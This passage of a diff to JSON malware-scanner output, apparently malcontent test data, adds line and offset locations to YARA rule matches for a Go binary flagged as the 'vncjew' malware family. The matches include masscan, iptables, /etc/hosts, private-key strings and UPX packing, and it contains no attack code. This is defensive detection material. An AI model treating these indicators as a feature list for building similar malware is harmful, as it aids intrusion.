+                    "StartingOffset": 420,
+                    "EndingOffset": 15,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref",
@@ -128,6 +152,10 @@
                         "UserPassword",
                         "passwordSet"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6040,
+                    "StartingOffset": 13458,
+                    "EndingOffset": 116728,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password",
@@ -139,6 +167,9 @@
                     "MatchStrings": [
                         "privateKey"
                     ],
+                    "StartingLine": 4043,
+                    "EndingLine": 4043,
+                    "EndingOffset": 9,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val",
@@ -150,6 +181,9 @@
                     "MatchStrings": [
                         "crypto/aes"
                     ],
+                    "StartingLine": 3801,
+                    "EndingLine": 6048,
+                    "EndingOffset": 18612,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -161,6 +195,9 @@
                     "MatchStrings": [
                         "ciphertext"
                     ],
+                    "StartingLine": 3985,
+                    "EndingLine": 4518,
+                    "EndingOffset": 2098,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext",
@@ -173,6 +210,10 @@
                         "NewCBCDecrypter",
                         "cbcDecrypter"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6040,
+                    "StartingOffset": 10794,
+                    "EndingOffset": 99909,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt",
@@ -184,6 +225,10 @@
                     "MatchStrings": [
                         "crypto/ecdsa"
                     ],
+                    "StartingLine": 4096,
+                    "EndingLine": 6048,
+                    "StartingOffset": 940,
+                    "EndingOffset": 21098,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa",
@@ -195,6 +240,10 @@
                     "MatchStrings": [
                         "ed25519"
                     ],
+                    "StartingLine": 4098,
+                    "EndingLine": 6048,
+                    "StartingOffset": 1405,
+                    "EndingOffset": 21744,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519",
@@ -208,6 +257,10 @@
                         "NewCBCEncrypter",
                         "cbcEncrypter"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6040,
+                    "StartingOffset": 10812,
+                    "EndingOffset": 99871,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt",
@@ -221,6 +274,10 @@
                         "PublicKey",
                         "publicKey"
                     ],
+                    "StartingLine": 3798,
+                    "EndingLine": 6040,
+                    "StartingOffset": 1905,
+                    "EndingOffset": 137021,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key",
@@ -233,6 +290,10 @@
                         "$cmp_e_x_256",
                         "$cmp_r_x_256"
                     ],
+                    "StartingLine": 408,
+                    "EndingLine": 3330,
+                    "StartingOffset": 26,
+                    "EndingOffset": 462,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa",
@@ -247,6 +308,9 @@
                         "TLSVersion",
                         "TLS13"
                     ],
+                    "StartingLine": 3807,
+                    "EndingLine": 6048,
+                    "EndingOffset": 27400,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls",
@@ -258,6 +322,10 @@
                     "MatchStrings": [
                         "gzip"
                     ],
+                    "StartingLine": 4493,
+                    "EndingLine": 6048,
+                    "StartingOffset": 1351,
+                    "EndingOffset": 28160,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip",
@@ -270,6 +338,10 @@
                     "MatchStrings": [
                         "base64"
                     ],
+                    "StartingLine": 4100,
+                    "EndingLine": 6048,
+                    "StartingOffset": 330,
+                    "EndingOffset": 14630,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64",
@@ -281,6 +353,10 @@
                     "MatchStrings": [
                         "encoding/json"
                     ],
+                    "StartingLine": 4097,
+                    "EndingLine": 6048,
+                    "StartingOffset": 778,
+                    "EndingOffset": 17912,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json.yara#encoding_json",
@@ -292,6 +368,10 @@
                     "MatchStrings": [
                         "json.Unmarshal"
                     ],
+                    "StartingLine": 4100,
+                    "EndingLine": 6040,
+                    "StartingOffset": 5988,
+                    "EndingOffset": 72627,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode",
@@ -303,6 +383,10 @@
                     "MatchStrings": [
                         "md5:"
                     ],
+                    "StartingLine": 4516,
+                    "EndingLine": 4520,
+                    "StartingOffset": 7107,
+                    "EndingOffset": 420,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5",
@@ -314,6 +398,10 @@
                     "MatchStrings": [
                         "nproc"
                     ],
+                    "StartingLine": 4493,
+                    "EndingLine": 4493,
+                    "StartingOffset": 694,
+                    "EndingOffset": 698,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count",
@@ -326,6 +414,10 @@
                     "MatchStrings": [
                         "/proc/sys/kernel/hostname"
                     ],
+                    "StartingLine": 4512,
+                    "EndingLine": 4512,
+                    "StartingOffset": 145,
+                    "EndingOffset": 169,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname",
@@ -338,6 +430,10 @@
                     "MatchStrings": [
                         "syscall.Uname"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 58195,
+                    "EndingOffset": 58207,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname",
@@ -351,6 +447,10 @@
                         "getenv",
                         "HOME"
                     ],
+                    "StartingLine": 4479,
+                    "EndingLine": 6040,
+                    "StartingOffset": 41,
+                    "EndingOffset": 5209,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME",
@@ -364,6 +464,10 @@
                         "getenv",
                         "USER"
                     ],
+                    "StartingLine": 4479,
+                    "EndingLine": 6040,
+                    "StartingOffset": 46,
+                    "EndingOffset": 5209,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER",
@@ -376,6 +480,10 @@
                     "MatchStrings": [
                         "iptables"
                     ],
+                    "StartingLine": 4518,
+                    "EndingLine": 4518,
+                    "StartingOffset": 3381,
+                    "EndingOffset": 3388,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/bypass_security/linux/iptables.yara#iptables",
@@ -390,6 +498,10 @@
                         "INPUT",
                         "-A"
                     ],
+                    "StartingLine": 409,
+                    "EndingLine": 23690,
+                    "StartingOffset": 437,
+                    "EndingOffset": 1304,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/bypass_security/linux/iptables_append.yara#iptables_append_broken",
@@ -402,6 +514,10 @@
                         "CombinedOutput",
                         "exec"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6048,
+                    "StartingOffset": 10482,
+                    "EndingOffset": 31214,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen_go",
@@ -414,6 +530,9 @@
                     "MatchStrings": [
                         "out of range pluginpath"
                     ],
+                    "StartingLine": 4037,
+                    "EndingLine": 4493,
+                    "EndingOffset": 646,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin",
@@ -425,6 +544,10 @@
                     "MatchStrings": [
                         "exec.(*Cmd).Run"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 153756,
+                    "EndingOffset": 153770,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run",
@@ -436,6 +559,10 @@
                     "MatchStrings": [
                         ".ReadDir"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 64283,
+                    "EndingOffset": 64290,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir",
@@ -447,6 +574,10 @@
                     "MatchStrings": [
                         "openFile"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 65579,
+                    "EndingOffset": 65586,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open",
@@ -459,6 +590,10 @@
                         "os.(*File).Read",
                         "ReadFile"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 64273,
+                    "EndingOffset": 65478,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read",
@@ -470,6 +605,10 @@
                     "MatchStrings": [
                         "readlinkat"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 58099,
+                    "EndingOffset": 58108,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -497,6 +636,10 @@
                         "/etc/resolv.conf",
                         "/etc/services"
                     ],
+                    "StartingLine": 4487,
+                    "EndingLine": 4523,
+                    "StartingOffset": 1464,
+                    "EndingOffset": 2297,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path",
@@ -508,6 +651,10 @@
                     "MatchStrings": [
                         "/etc/hosts"
                     ],
+                    "StartingLine": 4487,
+                    "EndingLine": 4487,
+                    "StartingOffset": 1464,
+                    "EndingOffset": 1473,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts",
@@ -519,6 +666,10 @@
                     "MatchStrings": [
                         "/etc/resolv.conf"
                     ],
+                    "StartingLine": 4498,
+                    "EndingLine": 4498,
+                    "StartingOffset": 48,
+                    "EndingOffset": 63,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf",
@@ -531,6 +682,10 @@
                         "/home/user/go/pkg/mod/golang.org/x/net",
                         "/home/user/vncjew/client/main.go"
                     ],
+                    "StartingLine": 6048,
+                    "EndingLine": 6048,
+                    "StartingOffset": 31296,
+                    "EndingOffset": 31590,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path",
@@ -542,6 +697,10 @@
                     "MatchStrings": [
                         "Chown"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 3796,
+                    "StartingOffset": 5825,
+                    "EndingOffset": 5829,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown",
@@ -554,6 +713,10 @@
                         "chmod",
                         "Chmod"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 3796,
+                    "StartingOffset": 5818,
+                    "EndingOffset": 6382,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod",
@@ -566,6 +729,10 @@
                     "MatchStrings": [
                         "tmpfile"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 3796,
+                    "StartingOffset": 12702,
+                    "EndingOffset": 12708,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp",
@@ -579,6 +746,10 @@
                         "iptables",
                         "masscan"
                     ],
+                    "StartingLine": 4512,
+                    "EndingLine": 6040,
+                    "StartingOffset": 278,
+                    "EndingOffset": 164709,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/malware/family/vncjew.yara#vncjew",
@@ -592,6 +763,10 @@
                         "dnsmessage",
                         "SetEDNS0"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6048,
+                    "StartingOffset": 13658,
+                    "EndingOffset": 23918,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs",
@@ -603,6 +778,10 @@
                     "MatchStrings": [
                         "CNAMEResource"
                     ],
+                    "StartingLine": 4097,
+                    "EndingLine": 4097,
+                    "StartingOffset": 1903,
+                    "EndingOffset": 1915,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local",
@@ -615,6 +794,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 2168,
+                    "EndingLine": 6048,
+                    "StartingOffset": 123,
+                    "EndingOffset": 24638,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -627,6 +810,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 3421,
+                    "EndingLine": 6048,
+                    "StartingOffset": 558,
+                    "EndingOffset": 30554,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -639,6 +826,10 @@
                         "application/json",
                         "Accept"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 4500,
+                    "StartingOffset": 8358,
+                    "EndingOffset": 31,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_json",
@@ -650,6 +841,10 @@
                     "MatchStrings": [
                         "Accept-Encoding"
                     ],
+                    "StartingLine": 4496,
+                    "EndingLine": 4496,
+                    "StartingOffset": 180,
+                    "EndingOffset": 194,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept-encoding.yara#content_type",
@@ -663,6 +858,10 @@
                         "Www-Authenticate",
                         "www-authenticate"
                     ],
+                    "StartingLine": 4498,
+                    "EndingLine": 4501,
+                    "StartingOffset": 432,
+                    "EndingOffset": 303,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth",
@@ -675,6 +874,10 @@
                         "Cookie",
                         "HTTP"
                     ],
+                    "StartingLine": 3451,
+                    "EndingLine": 6040,
+                    "StartingOffset": 560,
+                    "EndingOffset": 150812,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie",
@@ -690,6 +893,10 @@
                         "HTTP",
                         "http"
                     ],
+                    "StartingLine": 3421,
+                    "EndingLine": 6048,
+                    "StartingOffset": 219,
+                    "EndingOffset": 30554,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -701,6 +908,10 @@
                     "MatchStrings": [
                         "Proxy-Authorization"
                     ],
+                    "StartingLine": 4502,
+                    "EndingLine": 4502,
+                    "StartingOffset": 1565,
+                    "EndingOffset": 1583,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#proxy_auth",
@@ -715,6 +926,10 @@
                         "HTTP/1.",
                         "Referer"
                     ],
+                    "StartingLine": 3451,
+                    "EndingLine": 4489,
+                    "StartingOffset": 560,
+                    "EndingOffset": 70,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request",
@@ -726,6 +941,10 @@
                     "MatchStrings": [
                         "WebSocket"
                     ],
+                    "StartingLine": 4502,
+                    "EndingLine": 4516,
+                    "StartingOffset": 1626,
+                    "EndingOffset": 3890,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket",
@@ -739,6 +958,10 @@
                         "IP address",
                         "ipAddr"
                     ],
+                    "StartingLine": 4488,
+                    "EndingLine": 6040,
+                    "StartingOffset": 30,
+                    "EndingOffset": 112071,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr",
@@ -751,6 +974,10 @@
                         "hostname",
                         "port"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6048,
+                    "StartingOffset": 5458,
+                    "EndingOffset": 25214,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#hostname_port",
@@ -762,6 +989,10 @@
                     "MatchStrings": [
                         "multicast"
                     ],
+                    "StartingLine": 4516,
+                    "EndingLine": 4516,
+                    "StartingOffset": 7528,
+                    "EndingOffset": 7536,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast",
@@ -774,6 +1005,10 @@
                     "MatchStrings": [
                         "IsLinkLocalUnicast"
                     ],
+                    "StartingLine": 4100,
+                    "EndingLine": 6040,
+                    "StartingOffset": 9129,
+                    "EndingOffset": 110957,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#ip_go",
@@ -785,6 +1020,10 @@
                     "MatchStrings": [
                         "LookupIP"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6040,
+                    "StartingOffset": 13348,
+                    "EndingOffset": 110104,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr",
@@ -799,6 +1038,10 @@
                         "vnc",
                         "VNC"
                     ],
+                    "StartingLine": 4476,
+                    "EndingLine": 20083,
+                    "StartingOffset": 87,
+                    "EndingOffset": 6,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_elf_subtle",
@@ -810,6 +1053,9 @@
                     "MatchStrings": [
                         "LookupHost"
                     ],
+                    "StartingLine": 3912,
+                    "EndingLine": 3912,
+                    "EndingOffset": 9,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#go_resolve",
@@ -822,6 +1068,10 @@
                         "socket",
                         "accept"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6040,
+                    "StartingOffset": 9246,
+                    "EndingOffset": 113739,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen",
@@ -833,6 +1083,10 @@
                     "MatchStrings": [
                         "getsockname"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 58454,
+                    "EndingOffset": 58464,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname",
@@ -845,6 +1099,10 @@
                     "MatchStrings": [
                         "SetsockoptInt"
                     ],
+                    "StartingLine": 4097,
+                    "EndingLine": 6040,
+                    "StartingOffset": 2248,
+                    "EndingOffset": 63740,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-options-set.yara#go_setsockopt_int",
@@ -856,6 +1114,10 @@
                     "MatchStrings": [
                         "getpeername"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 58434,
+                    "EndingOffset": 58444,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername",
@@ -868,6 +1130,10 @@
                     "MatchStrings": [
                         "recvfrom"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 58474,
+                    "EndingOffset": 58481,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg",
@@ -880,6 +1146,10 @@
                     "MatchStrings": [
                         "sendto"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6040,
+                    "StartingOffset": 58491,
+                    "EndingOffset": 58496,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg",
@@ -892,6 +1162,10 @@
                     "MatchStrings": [
                         "dialTCP"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6040,
+                    "StartingOffset": 11694,
+                    "EndingOffset": 114218,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp",
@@ -903,6 +1177,10 @@
                     "MatchStrings": [
                         "ReadFromUDP"
                     ],
+                    "StartingLine": 4095,
+                    "EndingLine": 4100,
+                    "StartingOffset": 1429,
+                    "EndingOffset": 11234,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen",
@@ -915,6 +1193,10 @@
                         "WriteMsgUDP",
                         "DialUDP"
                     ],
+                    "StartingLine": 4095,
+                    "EndingLine": 6040,
+                    "StartingOffset": 1650,
+                    "EndingOffset": 114413,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send",
@@ -926,6 +1208,10 @@
                     "MatchStrings": [
                         "http://invalidlookup"
                     ],
+                    "StartingLine": 4481,
+                    "EndingLine": 4481,
+                    "StartingOffset": 707,
+                    "EndingOffset": 726,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -937,6 +1223,9 @@
                     "MatchStrings": [
                         "RequestURI"
                     ],
+                    "StartingLine": 3941,
+                    "EndingLine": 6040,
+                    "EndingOffset": 116985,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle",
@@ -948,6 +1237,10 @@
                     "MatchStrings": [
                         "net/url"
                     ],
+                    "StartingLine": 3796,
+                    "EndingLine": 6048,
+                    "StartingOffset": 10470,
+                    "EndingOffset": 25790,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls",
@@ -960,6 +1253,10 @@
                         "syscall.Sendfile",
                         "sendfile"
                     ],
+                    "StartingLine": 6040,
+                    "EndingLine": 6048,
+                    "StartingOffset": 58304,
+                    "EndingOffset": 25292,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile",
@@ -972,6 +1269,10 @@
                     "MatchStrings": [
                         "netlink"
                     ],
+                    "StartingLine": 6048,
+                    "EndingLine": 6048,
+                    "StartingOffset": 15126,
+                    "EndingOffset": 15132,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink",
@@ -985,6 +1286,10 @@
                         "masscan",
                         "system"
                     ],
+                    "StartingLine": 4497,
+                    "EndingLine": 6040,
+                    "StartingOffset": 137,
+                    "EndingOffset": 153770,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/sec-tool/net/masscan.yara#masscan_elf",
@@ -1011,6 +1316,10 @@
                         "executable packer",
                         "UPX!"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 11884,
+                    "StartingOffset": 236,
+                    "EndingOffset": 287,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx",
@@ -1022,6 +1331,10 @@
                     "MatchStrings": [
                         "2.5.4.3"
                     ],
+                    "StartingLine": 4846,
+                    "EndingLine": 4846,
+                    "StartingOffset": 40,
+                    "EndingOffset": 46,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#hardcoded_ip",
@@ -1034,6 +1347,10 @@
                         "http://",
                         "amd64"
                     ],
+                    "StartingLine": 5863,
+                    "EndingLine": 11860,
+                    "StartingOffset": 35,
+                    "EndingOffset": 65,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -1045,6 +1362,10 @@
                     "MatchStrings": [
                         "/proc/self/exe"
                     ],
+                    "StartingLine": 11863,
+                    "EndingLine": 11863,
+                    "StartingOffset": 12,
+                    "EndingOffset": 25,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe",
@@ -1057,6 +1378,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 4343,
+                    "EndingLine": 4443,
+                    "StartingOffset": 211,
+                    "EndingOffset": 214,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -1069,6 +1394,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 3944,
+                    "EndingLine": 11860,
+                    "StartingOffset": 79,
+                    "EndingOffset": 62,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -1080,6 +1409,10 @@
                     "MatchStrings": [
                         "HTTP/1."
                     ],
+                    "StartingLine": 3978,
+                    "EndingLine": 3978,
+                    "StartingOffset": 448,
+                    "EndingOffset": 454,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
